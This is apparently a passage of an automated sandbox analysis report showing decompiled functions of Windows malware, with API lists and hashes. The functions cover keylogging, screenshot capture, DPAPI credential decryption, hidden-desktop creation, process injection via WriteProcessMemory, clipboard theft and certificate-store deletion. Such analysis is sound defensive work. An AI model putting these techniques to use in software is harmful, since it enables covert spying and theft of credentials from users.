    											}
    										} else {
    											__eflags = _t42->wParam - 8;
    											if(_t42->wParam != 8) {
    												L17:
    												__eflags = _v884 - 0x20;
    												if(_v884 >= 0x20) {
    													L18:
    													__eflags = 0;
    													 *((short*)(_t74 + 0x10 + _t29 * 2)) = 0;
    													_push( &_v884);
    													goto L19;
    												}
    											} else {
    												_push(0x40397c);
    												L19:
    												E00423620();
    											}
    										}
    									}
    								}
    							}
    						}
    						goto L20;
    					} else {
    						EnterCriticalSection(0x42ede8);
    						if( *0x42ede0 > 0) {
    							 *0x42ede0 =  *0x42ede0 + 0xffff;
    							_t67 =  &_v864;
    							E00424100(2, _t67);
    							_push(0x1f4);
    							_push(0x1e);
    							_push(_t67);
    							_t63 = E0041E910();
    							if(_t63 != 0) {
    								E00424100(0, _t74 + 0x3c);
    								E00424100(1,  &_v884);
    								_t70 =  *0x42e8f4;
    								if(_t70 == 0) {
    									_t70 =  &_v884;
    								}
    								E00411D10( *0x42eb68, 0x104, _t74 + 0x188, _t74 + 0x48);
    								E0040D7F0(_t63, _t74 + 0x188);
    								 *((intOrPtr*)( *((intOrPtr*)( *_t63 + 8))))(_t63, _t70,  *0x42eb68, GetTickCount());
    							}
    						}
    						LeaveCriticalSection(0x42ede8);
    						return TranslateMessage(_t42);
    					}
    				}
    			}

    APIs
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 00423862
    • EnterCriticalSection.KERNEL32(0042EDE8), ref: 00423883
    • GetTickCount.KERNEL32 ref: 004238ED
    • LeaveCriticalSection.KERNEL32(0042EDE8), ref: 00423929
    • TranslateMessage.USER32(?), ref: 00423930
      • Part of subcall function 0041E910: VirtualProtect.KERNEL32(00409C70,000005DC,00000004,?,?,00000000,?,00000000), ref: 0041E92E
      • Part of subcall function 0041E910: LoadLibraryA.KERNEL32 ref: 0041E95D
      • Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0041E96D
      • Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 0041E979
      • Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 0041E985
      • Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 0041E991
      • Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 0041E99D
      • Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0041E9A9
      • Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 0041E9B5
      • Part of subcall function 0041E910: LoadLibraryA.KERNEL32(ole32.dll), ref: 0041EA04
      • Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0041EA10
      • Part of subcall function 0041E910: LoadLibraryA.KERNEL32(gdi32.dll), ref: 0041EA23
      • Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0041EA2D
      • Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 0041EA37
      • Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 0041EA43
      • Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 0041EA4F
      • Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,SelectObject), ref: 0041EA5B
      • Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,BitBlt), ref: 0041EA67
    • GetKeyboardState.USER32(?), ref: 00423951
    • ToUnicode.USER32 ref: 0042397B
    • TranslateMessage.USER32(?), ref: 004239B3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$LibraryLoad$CriticalMessageSectionTranslate$CountEnterKeyboardLeaveObjectProtectSingleStateTickUnicodeVirtualWait
    • String ID:
    • API String ID: 3249436153-3916222277
    • Opcode ID: a7bad5132c88083581c8edb69458db7cb2c7778cffee6eaab936e3dc5be3433e
    • Instruction ID: 76b4f90217f239abd592522bf67283ccb948a1775e3e3ae68731173d321cd955
    • Opcode Fuzzy Hash: a7bad5132c88083581c8edb69458db7cb2c7778cffee6eaab936e3dc5be3433e
    • Instruction Fuzzy Hash: 614107B230022157D720EF15EC49BAB73B8EB85701F84442EF945972A1DBBCD984C7A9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 57%
    			E0041FB50(void* __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
    				char _v104;
    				char _v128;
    				char _v144;
    				char _v156;
    				void* _v160;
    				signed int _v164;
    				intOrPtr _v168;
    				char _v176;
    				void* _v180;
    				void* _v184;
    				signed int _v188;
    				char* _v192;
    				intOrPtr _v196;
    				void* _v200;
    				intOrPtr _v201;
    				intOrPtr _v204;
    				signed int _v208;
    				signed int _v221;
    				intOrPtr _v228;
    				void* __edi;
    				void* __esi;
    				signed int _t53;
    				signed int _t54;
    				intOrPtr _t55;
    				intOrPtr _t56;
    				char* _t57;
    				signed int _t65;
    				signed int _t69;
    				void* _t72;
    				signed int _t75;
    				signed int _t76;
    				long _t77;
    				void* _t79;
    				signed int* _t84;
    				void* _t92;
    				intOrPtr* _t101;
    				char* _t109;
    				signed int _t112;
    				signed int _t119;
    				char* _t120;
    				void* _t121;
    				intOrPtr* _t122;
    				char* _t125;
    				intOrPtr _t129;
    				signed int* _t130;
    				signed int _t142;
    
    				_t132 = __eflags;
    				_t130 =  &_v208;
    				_t129 = _a4;
    				_t118 = __eax;
    				_t92 = E0041FAC0(0x4c, __eax, __eflags, _t129);
    				_v204 = E0041FAC0(0x4f, _t118, _t132, _t129);
    				_t121 = E0041FAC0(0x50, _t118, _t132, _t129);
    				_v180 = _t121;
    				_v208 = E0041FAC0(0x4d, _t118, _t132, _t129);
    				_t53 = E0041FAC0(0x4e, _t118, _t132, _t129);
    				_t119 = _t53;
    				_t54 = _t53 & 0xffffff00 | _t92 != 0x00000000;
    				_v208 = _t119;
    				_v221 = _t54;
    				if(_t54 == 0) {
    					L34:
    					_t122 = __imp__#6;
    					if(_t92 != 0) {
    						 *_t122(_t92);
    					}
    					_t55 = _v196;
    					if(_t55 != 0) {
    						 *_t122(_t55);
    					}
    					_t56 = _v168;
    					if(_t56 != 0) {
    						 *_t122(_t56);
    					}
    					_t57 = _v192;
    					if(_t57 != 0) {
    						 *_t122(_t57);
    					}
    					if(_t119 != 0) {
    						 *_t122(_t119);
    					}
    					return _v201;
    				} else {
    					_v184 = 0;
    					if(_t121 != 0) {
    						_v180 = E00411140(_t121);
    					} else {
    						_v180 = 0;
    					}
    					_v200 = 0;
    					if(_v196 != 0) {
    						E00424100(0x44,  &_v156);
    						_push(_v196);
    						E00411D10(_v196, 0xc,  &_v128,  &_v156);
    						_t130 =  &(_t130[2]);
    						_v184 = E00411140( &_v128);
    					}
    					_t65 = 0;
    					if(_t119 == 0) {
    						L22:
    						E00424100(0x4b,  &_v104);
    						E00424100(0x54,  &_v144);
    						_t120 = _v200;
    						if(_t120 == 0) {
    							_t120 = 0x4032e8;
    						}
    						_t125 = _v192;
    						if(_t125 == 0) {
    							_t125 = 0x4032e8;
    						}
    						_t109 = 0x4032e8;
    						if(_v180 != 0) {
    							_t109 =  &_v144;
    						}
    						_t101 =  *_a12;
    						_t69 = 0;
    						if(_t101 == 0 ||  *_t101 == 0) {
    							L31:
    							_push(_t120);
    							_push(_t125);
    							_push(_t109);
    							_push(_v184);
    							_push(_t92);
    							_push(_t129);
    							_push( &_v104);
    							_push(_t69);
    							E00411E10(_a12, _t152);
    							_t72 = _v200;
    							if(_t72 != 0) {
    								HeapFree( *0x42e6d4, 0, _t72);
    							}
    							_t119 = _v188;
    							goto L34;
    						} else {
    							do {
    								_t69 = _t69 + 1;
    								_t152 =  *((short*)(_t101 + _t69 * 2));
    							} while ( *((short*)(_t101 + _t69 * 2)) != 0);
    							goto L31;
    						}
    					}
    					if( *_t119 == 0) {
    						L10:
    						if(_t65 > 1) {
    							_t112 = _t65 & 0x80000001;
    							if(_t112 < 0) {
    								_t112 = (_t112 - 0x00000001 | 0xfffffffe) + 1;
    								_t142 = _t112;
    							}
    							if(_t142 == 0) {
    								asm("cdq");
    								_t75 = _t65 - _t112;
    								_t76 = _t75 >> 1;
    								_v164 = _t76;
    								if(_t75 != 0) {
    									_t77 = _t76 + 4;
    									__eflags = _t77;
    									_t79 = HeapAlloc( *0x42e6d4, 8, _t77);
    								} else {
    									_t79 = 0;
    								}
    								_v160 = _t79;
    								if(_t79 != 0) {
    									if(E004112A0(_t119, _t79) != 0) {
    										_t84 =  &_v164;
    										__imp__CryptUnprotectData(_t84, 0, _a8, 0, 0, 0,  &_v176);
    										if(_t84 == 1) {
    											_v228 = E00410D20(_v200);
    											LocalFree(_v200);
    										}
    									}
    									E004107C0(_v160);
    								}
    							}
    						}
    						goto L22;
    					} else {
    						do {
    							_t65 = _t65 + 1;
    						} while ( *((short*)(_t119 + _t65 * 2)) != 0);
    						goto L10;
    					}
    				}
    			}

    APIs
    • HeapAlloc.KERNEL32(?,00000008,-00000004,?,?), ref: 0041FC71
    • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,00000000,?), ref: 0041FCA6
    • LocalFree.KERNEL32(?), ref: 0041FCC7
    • HeapFree.KERNEL32(?,00000000,?,?), ref: 0041FD6B
    • SysFreeString.OLEAUT32(00000000), ref: 0041FD80
    • SysFreeString.OLEAUT32(?), ref: 0041FD8B
    • SysFreeString.OLEAUT32(?), ref: 0041FD96
    • SysFreeString.OLEAUT32(?), ref: 0041FDA1
    • SysFreeString.OLEAUT32(00000000), ref: 0041FDA8
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Free$String$Heap$AllocCryptDataLocalUnprotect
    • String ID:
    • API String ID: 2178157609-0
    • Opcode ID: 02aa8935d25c527dfd615f59a30a18287007b6b848499b52ce5bfa56c3ba6bd3
    • Instruction ID: 3fa4bbe6a9c0c058f76f42d5f2f3c658b6bcc88dfaed2eaf79a188984f9c7ae6
    • Opcode Fuzzy Hash: 02aa8935d25c527dfd615f59a30a18287007b6b848499b52ce5bfa56c3ba6bd3
    • Instruction Fuzzy Hash: 3661B2716043019BD7109B65D841BABB7E9ABC4704F04493FF945E7390EB7CEC8A8B9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041A370(WCHAR* __eax, void* __eflags) {
    				char _v16;
    				char _v32;
    				struct HWINSTA__* _v36;
    				void* __esi;
    				long _t8;
    				WCHAR* _t13;
    				void* _t21;
    				WCHAR* _t23;
    				WCHAR* _t24;
    				struct HDESK__* _t25;
    				struct HWINSTA__* _t27;
    
    				_t24 =  &_v32;
    				_t22 = 0xcc;
    				_t23 = __eax;
    				_t21 = 0;
    				E00424100(0xcc, _t24);
    				_t8 = OpenWindowStationW(_t24, 0, 0x10000000);
    				_t27 = _t8;
    				if(_t27 != 0) {
    					L2:
    					_v36 = GetProcessWindowStation();
    					if(E0041A270(_t22, _t27) == 0) {
    						L10:
    						CloseWindowStation(_t27);
    						L11:
    						return _t21;
    					}
    					if(_t23 == 0) {
    						_t23 =  &_v16;
    						_t22 = 0xcd;
    						E00424100(0xcd, _t23);
    					}
    					_t13 = OpenDesktopW(_t23, 0, 0, 0x10000000);
    					_t25 = _t13;
    					if(_t25 != 0) {
    						L7:
    						_t21 = E0041A2F0(_t22, _t25);
    						CloseDesktop(_t25);
    						if(_t21 != 0) {
    							goto L10;
    						}
    						goto L8;
    					} else {
    						_t25 = CreateDesktopW(_t23, _t13, _t13, _t13, 0x10000000, _t13);
    						if(_t25 == 0) {
    							L8:
    							_t16 = _v36;
    							if(_v36 != 0) {
    								E0041A270(_t22, _t16);
    							}
    							goto L10;
    						}
    						goto L7;
    					}
    				}
    				_t22 = _t24;
    				_t27 = CreateWindowStationW(_t24, _t8, 0x10000000, _t8);
    				if(_t27 == 0) {
    					goto L11;
    				}
    				goto L2;
    			}

    APIs
    • OpenWindowStationW.USER32 ref: 0041A393
    • CreateWindowStationW.USER32 ref: 0041A3A9
    • GetProcessWindowStation.USER32(?,75315FF0,?,?,?,?,?,00426917,?,?,00000000), ref: 0041A3B5
    • OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 0041A3E7
    • CreateDesktopW.USER32 ref: 0041A3FD
    • CloseDesktop.USER32(00000000,00000000,?,75315FF0,?,?,?,?,?,00426917,?,?,00000000), ref: 0041A412
    • CloseWindowStation.USER32(00000000,00000000,?,75315FF0,?,?,?,?,?,00426917,?,?,00000000), ref: 0041A42B
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: StationWindow$Desktop$CloseCreateOpen$Process
    • String ID:
    • API String ID: 951938242-0
    • Opcode ID: 0879c1f49e4e35b45f5cc03f1e87af6f09d6f7d153760ce8be123f91f879de30
    • Instruction ID: 6c593244c0beb0c9b2a164ed78805d663e8c8c10bf4dfb06ee6ac70a893f95db
    • Opcode Fuzzy Hash: 0879c1f49e4e35b45f5cc03f1e87af6f09d6f7d153760ce8be123f91f879de30
    • Instruction Fuzzy Hash: 7711BE756423216BE620AB756D08BEB379CDB55794F00002AFD01F3362EA6CEC9845AE
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 33%
    			E00414F40(short __edx) {
    				signed int _t13;
    				long _t16;
    				signed int _t17;
    				intOrPtr* _t27;
    				short _t30;
    				intOrPtr* _t35;
    				signed int _t36;
    				void* _t37;
    				void* _t38;
    
    				_t30 = __edx;
    				if(__edx == 2 || __edx == 0x17) {
    					E00410870(_t38 + 0x18, _t38 + 0x18, 0, 0x80);
    					_t35 = __imp__#23;
    					_t27 = __imp__#2;
    					 *((short*)(_t38 + 0x10)) = _t30;
    					_t37 = 0x9c40;
    					do {
    						_t16 = GetTickCount();
    						if(_t16 !=  *0x42dd08) {
    							 *0x42dd08 = _t16;
    							E00412320(_t16);
    						}
    						_t17 = E00412360();
    						asm("rol dx, 0x8");
    						 *((short*)(_t38 + 0x1a)) = _t17 % 0x7531 + 0x2710;
    						_t13 =  *_t35( *(_t38 + 0x18) & 0x0000ffff, 1, 6);
    						_t36 = _t13;
    						if(_t36 == 0xffffffff) {
    							goto L9;
    						} else {
    							_t13 =  *_t27(_t36, _t38 + 0x10, ((0 |  *((short*)(_t38 + 0x10)) != 0x00000002) - 0x00000001 & 0xfffffff4) + 0x1c);
    							if(_t13 != 0) {
    								L8:
    								__imp__#3(_t36);
    								goto L9;
    							} else {
    								__imp__#13(_t36, 0x7fffffff);
    								if(_t13 == 0) {
    									return _t36;
    								} else {
    									goto L8;
    								}
    							}
    						}
    						goto L12;
    						L9:
    						_t37 = _t37 - 1;
    					} while (_t37 > 0);
    					goto L10;
    				} else {
    					L10:
    					return _t13 | 0xffffffff;
    				}
    				L12:
    			}

    APIs
    • GetTickCount.KERNEL32 ref: 00414F80
    • socket.WS2_32(?,00000001,00000006), ref: 00414FBF
    • bind.WS2_32(00000000,00000002,-0000001D), ref: 00414FE1
    • listen.WS2_32(00000000,7FFFFFFF), ref: 00414FED
    • closesocket.WS2_32(00000000), ref: 00414FF8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CountTickbindclosesocketlistensocket
    • String ID: p0u
    • API String ID: 3574796091-1742372003
    • Opcode ID: 09c64914b0641a9b0747c175492a10d01bfe2c46d0d0c3c649c4dfb6fa714802
    • Instruction ID: a931c02b9080aca10abb5b8ee5c803272c3e439f9c55c05de76d6a7fa06d553f
    • Opcode Fuzzy Hash: 09c64914b0641a9b0747c175492a10d01bfe2c46d0d0c3c649c4dfb6fa714802
    • Instruction Fuzzy Hash: BD113A3161470657D320AB38EC456EF7798FFD13A0F444A26F960D72E0EB7C888643A9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004129B0(WCHAR* _a4) {
    				intOrPtr _v4;
    				struct _TOKEN_PRIVILEGES _v16;
    				void* _v20;
    				long _t22;
    
    				if(OpenThreadToken(GetCurrentThread(), 0x20, 0,  &_v20) != 0 || OpenProcessToken(0xffffffff, 0x20,  &_v20) != 0) {
    					_t22 = 0;
    					_v16.PrivilegeCount = 1;
    					_v4 = 2;
    					if(LookupPrivilegeValueW(0, _a4,  &(_v16.Privileges)) != 0 && AdjustTokenPrivileges(_v20, 0,  &_v16, 0, 0, 0) != 0 && GetLastError() == 0) {
    						_t22 = 1;
    					}
    					CloseHandle(_v20);
    					return _t22;
    				} else {
    					return 0;
    				}
    			}

    APIs
    • GetCurrentThread.KERNEL32 ref: 004129BD
    • OpenThreadToken.ADVAPI32(00000000), ref: 004129C4
    • OpenProcessToken.ADVAPI32(000000FF,00000020,?), ref: 004129D7
    • LookupPrivilegeValueW.ADVAPI32 ref: 00412A08
    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 00412A24
    • GetLastError.KERNEL32 ref: 00412A2E
    • CloseHandle.KERNEL32(?), ref: 00412A3F
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Token$OpenThread$AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesProcessValue
    • String ID:
    • API String ID: 2724707430-0
    • Opcode ID: 907a642ead2b95575d4c021f54c57a4bc6693c7d9728fd2ed30e4c1413f6bdb8
    • Instruction ID: 458083cc022ed9835a1fd4360ea37bccc42e6c746427ca93e34fb8b723c228c0
    • Opcode Fuzzy Hash: 907a642ead2b95575d4c021f54c57a4bc6693c7d9728fd2ed30e4c1413f6bdb8
    • Instruction Fuzzy Hash: E811A5B13403016FE6109F60DE4AF9777A8AB94B04F008519F945E61E1E7B8D845D73A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00417150(void* __eax, void* _a4) {
    				long _v4;
    				intOrPtr _v8;
    				void* _v12;
    				void* _v13;
    				void* _t36;
    				intOrPtr _t45;
    				signed int _t46;
    				long _t50;
    				signed int _t51;
    				signed int _t53;
    				intOrPtr _t56;
    				intOrPtr* _t57;
    				signed int _t62;
    				intOrPtr _t63;
    				void* _t64;
    				intOrPtr _t65;
    				void* _t68;
    				unsigned int _t71;
    				void* _t74;
    
    				_t68 = __eax;
    				_t63 =  *((intOrPtr*)(__eax + 0x3c));
    				_t50 =  *(_t63 + __eax + 0x50);
    				_t64 = _t63 + __eax;
    				_v4 = _t50;
    				_v13 = 0;
    				if(IsBadReadPtr(__eax, _t50) == 0) {
    					_t36 = VirtualAllocEx(_a4, 0, _t50, 0x3000, 0x40);
    					_v12 = _t36;
    					if(_t36 != 0) {
    						if(_t50 == 0) {
    							L18:
    							VirtualFreeEx(_a4, _v12, 0, 0x8000);
    							_v12 = 0;
    						} else {
    							_t74 = HeapAlloc( *0x42e6d4, 0, _t50 + 4);
    							if(_t74 == 0) {
    								goto L18;
    							} else {
    								E00410820(_t74, _t68, _t50);
    								if( *((intOrPtr*)(_t64 + 0xa4)) <= 0) {
    									L16:
    									_t51 = _v13;
    								} else {
    									_t56 =  *((intOrPtr*)(_t64 + 0xa0));
    									if(_t56 == 0) {
    										goto L16;
    									} else {
    										_t65 =  *((intOrPtr*)(_t64 + 0x34));
    										_t57 = _t56 + _t74;
    										_t53 = _v12 - _t65;
    										_v8 = _t68 - _t65;
    										while( *_t57 != 0) {
    											_t45 =  *((intOrPtr*)(_t57 + 4));
    											if(_t45 >= 8) {
    												_t71 = _t45 - 8 >> 1;
    												_t62 = 0;
    												if(_t71 != 0) {
    													do {
    														_t46 =  *(_t57 + 8 + _t62 * 2) & 0x0000ffff;
    														if(_t46 != 0) {
    															 *((intOrPtr*)((_t46 & 0x00000fff) +  *_t57 + _t74)) =  *((intOrPtr*)((_t46 & 0x00000fff) +  *_t57 + _t74)) + _t53 - _v8;
    														}
    														_t62 = _t62 + 1;
    													} while (_t62 < _t71);
    												}
    											}
    											_t57 = _t57 +  *((intOrPtr*)(_t57 + 4));
    										}
    										_t51 = _t53 & 0xffffff00 | WriteProcessMemory(_a4, _v12, _t74, _v4, 0) != 0x00000000;
    									}
    								}
    								HeapFree( *0x42e6d4, 0, _t74);
    								if(_t51 == 0) {
    									goto L18;
    								}
    							}
    						}
    					}
    					return _v12;
    				} else {
    					return 0;
    				}
    			}

    APIs
    • IsBadReadPtr.KERNEL32 ref: 0041716C
    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 00417190
    • HeapAlloc.KERNEL32(?,00000000,?,00000000), ref: 004171B8
    • WriteProcessMemory.KERNEL32(?,?,00000000,?,00000000,00000000,?,?), ref: 0041724D
    • HeapFree.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 00417267
    • VirtualFreeEx.KERNEL32(?,?,00000000,00008000,00000000), ref: 00417282
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: AllocFreeHeapVirtual$MemoryProcessReadWrite
    • String ID:
    • API String ID: 3557297850-0
    • Opcode ID: 5347e51a42341ed71737bbd49873ddf64a7f893120bf1da943359baf9a4657d8
    • Instruction ID: e5ac5cd9aafddfdb447b0c596dd665251eaa6f0ac9173e587eef7ed040220f59
    • Opcode Fuzzy Hash: 5347e51a42341ed71737bbd49873ddf64a7f893120bf1da943359baf9a4657d8
    • Instruction Fuzzy Hash: EE419B75608301AFD320CF64D984BA7B7B8FB98704F58446DF944AB290C778EC46CBA9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004239D0(int _a4) {
    				void* __esi;
    				void* _t9;
    				void* _t14;
    				void* _t17;
    				int _t18;
    				int _t19;
    				int _t21;
    
    				_t18 = _a4;
    				_t17 = GetClipboardData(_t18);
    				if(WaitForSingleObject( *0x42edbc, 0) != 0 && _t17 != 0 && (_t18 == 1 || _t18 == 0xd || _t18 == 7)) {
    					_t21 = GlobalLock(_t17);
    					if(_t21 != 0) {
    						_t9 = _t18 - 1;
    						if(_t9 == 0) {
    							_t19 = E00410AA0(_t21, 0, 0xffffffff);
    						} else {
    							_t14 = _t9 - 6;
    							if(_t14 == 0) {
    								_t19 = E00410AA0(_t21, 1, 0xffffffff);
    							} else {
    								if(_t14 != 6) {
    									_t19 = _a4;
    								} else {
    									_t19 = _t21;
    								}
    							}
    						}
    						if(_t19 != 0) {
    							EnterCriticalSection(0x42ede8);
    							E00423620(0x403980);
    							E00423620(_t19);
    							LeaveCriticalSection(0x42ede8);
    							if(_t19 != _t21) {
    								E004107C0(_t19);
    							}
    						}
    						GlobalUnlock(_t17);
    					}
    				}
    				return _t17;
    			}

    APIs
    • GetClipboardData.USER32 ref: 004239D7
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 004239E7
    • GlobalLock.KERNEL32 ref: 00423A0E
    • EnterCriticalSection.KERNEL32(0042EDE8,00000000,000000FF), ref: 00423A54
    • LeaveCriticalSection.KERNEL32(0042EDE8,00000000,00403980), ref: 00423A6F
    • GlobalUnlock.KERNEL32(00000000,00000000,000000FF), ref: 00423A81
      • Part of subcall function 00410AA0: MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,0040700E,0000FDE9,?), ref: 00410AE4
      • Part of subcall function 00410AA0: HeapAlloc.KERNEL32(?,00000008,-00000004,?,?,0040700E,0000FDE9,?), ref: 00410B05
      • Part of subcall function 00410AA0: MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000001,?,?,0040700E,0000FDE9,?), ref: 00410B34
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: ByteCharCriticalGlobalMultiSectionWide$AllocClipboardDataEnterHeapLeaveLockObjectSingleUnlockWait
    • String ID:
    • API String ID: 2993150087-0
    • Opcode ID: a902b307ccab85dacd2a1b39754aa9a8e654720a0f823630bb112d82cf33b6c5
    • Instruction ID: aaebd55efc4d60538a3f81200e497cdd45134bb810357bfef0854de8b8bfa8a7
    • Opcode Fuzzy Hash: a902b307ccab85dacd2a1b39754aa9a8e654720a0f823630bb112d82cf33b6c5
    • Instruction Fuzzy Hash: 9B11063630023167C2206F697C88B6F66399B95B63F99063FF196E73A0CE7CC941825D
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000040,00000000,74B5F780,74B5F780,?,?,?,00419076), ref: 00412486
    • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,?,00419076), ref: 004124A7
    • CryptHashData.ADVAPI32 ref: 004124CB
    • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 004124E9
    • CryptDestroyHash.ADVAPI32(?), ref: 00412502
    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,00419076), ref: 0041250F
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamRelease
    • String ID:
    • API String ID: 3186506766-0
    • Opcode ID: b6c52dc9bb1d02d3e78edf012d1bb749ba429b76eff0730747c79417dc97c8a0
    • Instruction ID: d80231df26b94d1ca82818cb005321da6368b4e31a4f5c3f439079dfdb15741f
    • Opcode Fuzzy Hash: b6c52dc9bb1d02d3e78edf012d1bb749ba429b76eff0730747c79417dc97c8a0
    • Instruction Fuzzy Hash: 88112175244300BFE710CF14DE85F6B77A9EB94B00F10C919F695E6290C7B4E888DB6A
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CertOpenSystemStoreW.CRYPT32(00000000,00403968), ref: 0042346B
    • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 00423481
    • CertDuplicateCertificateContext.CRYPT32(00000000), ref: 00423491
    • CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,?,00000001,0041D83D), ref: 00423498
    • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 004234A0
    • CertCloseStore.CRYPT32(00000000,00000000), ref: 004234AE
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Cert$Store$CertificateCertificatesEnum$CloseContextDeleteDuplicateFromOpenSystem
    • String ID:
    • API String ID: 3276010370-0
    • Opcode ID: 1d02b25a3371ad5244f583b37f0aaf48e3706127e1e3c4f5b52eb2f31b9618b7
    • Instruction ID: 1fff16008782fc0b791821716c0255c5cd1c9a879208098af8b06e725ccb713d
    • Opcode Fuzzy Hash: 1d02b25a3371ad5244f583b37f0aaf48e3706127e1e3c4f5b52eb2f31b9618b7
    • Instruction Fuzzy Hash: 28F0E93268132177C7222B696D48FABB77C9B45BA2F450062F984F33608E2CC84085BC
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 45%
    			E0040C999(intOrPtr* __eax, intOrPtr __ecx, void* __edx, long* __edi, signed int _a4, void* _a8, void* _a9, char _a11, signed int _a16, char _a28, char _a72, short _a80, signed int _a1092) {
    				void* _t48;
    				signed int _t54;
    				signed int* _t55;
    				signed int _t56;
